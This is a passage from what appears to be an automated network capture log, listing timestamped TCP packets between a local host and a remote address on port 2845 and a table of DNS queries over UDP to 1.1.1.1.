                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.609689951 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.609772921 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.610759974 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.610868931 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.611181974 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.611951113 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.653250933 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.745872974 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.745913982 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.746027946 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.746349096 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.746536016 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.746592045 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.747502089 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.747558117 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.748066902 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.748584032 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.748641968 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.748727083 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.749722958 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.749877930 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.749944925 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.750854969 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.751022100 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.751135111 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.751988888 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.752023935 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.752091885 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.753081083 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.753204107 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.753371954 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.754224062 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.754373074 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.754565001 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.755275965 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.755469084 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.755575895 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.756431103 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.756537914 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.756756067 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.757584095 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.757771969 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.757828951 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.758692980 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.758851051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.759006977 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.759810925 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.759888887 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.759953022 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.761066914 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.761122942 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.761373997 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.762288094 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.762455940 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.762511015 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.763777018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.763833046 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.764265060 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.764811039 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.764863968 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.765224934 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.765721083 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.765813112 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.765896082 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.766881943 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.767040968 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.767781973 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.767836094 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.767868996 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.767889023 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.768712997 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.768831015 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.769979000 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.770111084 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.770195007 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.770324945 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.770991087 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.771074057 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.771147013 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.772216082 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.772346020 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.773293018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.773344994 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.773360968 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.773421049 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.774343014 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.774411917 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.774504900 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.775475025 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.775619030 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.775680065 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.776596069 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.776700974 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.776818037 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.777678013 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.777813911 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.777888060 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.778846025 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.778971910 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.779113054 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.779984951 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.780128956 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.780603886 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.781039953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.781141996 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.781200886 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.782166004 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.782303095 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.782651901 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.783263922 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.783499956 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.784462929 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.784497976 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.784537077 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.784537077 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.785537958 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.785659075 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.785797119 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.786747932 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.786881924 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.786952972 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.787779093 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.787879944 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.788029909 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.788877964 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.789047956 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.789246082 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.790030956 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.790287971 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.790360928 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.791167974 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.791368008 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.791610956 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.792238951 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.792292118 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.792346001 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.793411970 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.793577909 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.793632984 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.794656038 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.794794083 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.795232058 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.795628071 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.795694113 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.795741081 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.796721935 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.796842098 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.797967911 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.798032999 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.798144102 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.798301935 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.798988104 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.799099922 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.799232006 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.800127983 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.800182104 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.800302029 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.801270962 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.801381111 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.801460981 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.802331924 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.802383900 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.802438974 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.803472042 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.803575993 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.803632975 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.804537058 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.856481075 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.962939024 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.963169098 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.963252068 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.963396072 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.963506937 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.963596106 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.964495897 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.964612007 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.964859009 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.965703964 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.965728998 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.965876102 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.966726065 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.966973066 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.967248917 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.967859030 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.967962980 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.968955040 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.969089985 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.969093084 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.969270945 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.970103979 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.970213890 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.970439911 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.971295118 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.971380949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.971431017 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.972335100 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.972497940 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.972558022 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.973428965 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.973582983 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.973658085 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.974622965 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.974740982 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.974960089 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.975680113 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.975770950 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.975862026 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.976900101 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.976988077 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.977062941 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.977921009 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.978049994 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.978092909 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.979026079 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.979146004 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.980161905 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.980220079 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.980262041 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.980325937 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.981270075 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.981353045 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.989463091 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.004822016 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.109426975 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.124330044 CET284549901104.161.43.18192.168.2.5

                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.184679985 CET6159153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:07.591938972 CET53615911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:11.335374117 CET5708853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:11.472011089 CET53570881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:13.971033096 CET5906053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:14.262378931 CET53590601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.722944021 CET5955953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.734770060 CET5433453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.735069036 CET5660753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.872852087 CET53543341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.020517111 CET53595591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.030214071 CET53566071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.027529955 CET5855153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.027785063 CET5395653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.532501936 CET5476053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.540124893 CET6299653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.540416002 CET6250353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.616723061 CET6447553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.616950989 CET5924553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.753535986 CET53644751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.807574987 CET53547601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.808350086 CET53629961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.832066059 CET53625031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.862685919 CET53592451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.159379005 CET5198753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.159513950 CET6074953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.159959078 CET6126453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.160200119 CET5519353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.169584036 CET5011953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.169750929 CET5957553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296510935 CET53607491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296547890 CET53519871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296664000 CET53612641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.296936035 CET53551931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.306664944 CET53595751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.306715965 CET53501191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.830996037 CET52107443192.168.2.5172.64.41.3
